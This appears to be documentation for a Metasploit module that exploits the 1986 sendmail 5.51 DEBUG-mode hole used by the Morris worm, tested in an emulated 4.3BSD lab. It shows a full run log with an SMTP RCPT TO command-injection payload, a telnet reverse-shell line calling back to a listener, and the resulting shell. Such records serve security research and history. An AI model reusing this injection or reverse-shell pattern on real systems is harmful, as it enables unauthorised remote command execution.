William Vu
3.9 KiB
Vulnerable Application
Description
This module exploits sendmail's well-known historical debug mode to
escape to a shell and execute commands in the SMTP RCPT TO command.
This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.
Setup
A Docker environment for 4.3BSD on VAX is available at https://github.com/wvu/ye-olde-bsd.
For manual setup, please follow the Computer History Wiki's guide or Allen Garvin's guide if you're using Quasijarus.
Verification Steps
Targets
0
This targets sendmail version 5.51 from 1986-05-02.
Options
RPORT
Set this to the target port. The default is 25 for sendmail, but the
port may be forwarded when NAT (SLiRP) is used in SIMH.
PAYLOAD
Set this to a Unix command payload. Currently, only cmd/unix/reverse
and cmd/unix/generic are supported.
Scenarios
sendmail 5.51 on 4.3BSD
msf5 > use exploit/unix/smtp/morris_sendmail_debug
msf5 exploit(unix/smtp/morris_sendmail_debug) > options
Module options (exploit/unix/smtp/morris_sendmail_debug):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 25 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 @(#)version.c 5.51 (Berkeley) 5/2/86
msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > run
[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Expecting: /220.*Sendmail/
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Expecting: /200 Debug set/
[*] 127.0.0.1:25 - Sending: MAIL FROM:<3V900gQTSR70m6QPRYJnf3eoUIe6>
[*] 127.0.0.1:25 - Expecting: /250.*Sender ok/
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Expecting: /250.*Recipient ok/
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Expecting: /354 Enter mail.*itself/
[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 3935|telnet 192.168.56.1 4444|while : ; do sh && break; done 2>&1|telnet 192.168.56.1 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Expecting: /250 Ok/
[*] 127.0.0.1:25 - Sending: QUIT
[*] 127.0.0.1:25 - Expecting: /221.*closing connection/
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ISj759F8jEik4HAW;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58037) at 2020-02-06 15:51:28 -0600
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you
whoami
daemon
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
Would you like to play a game?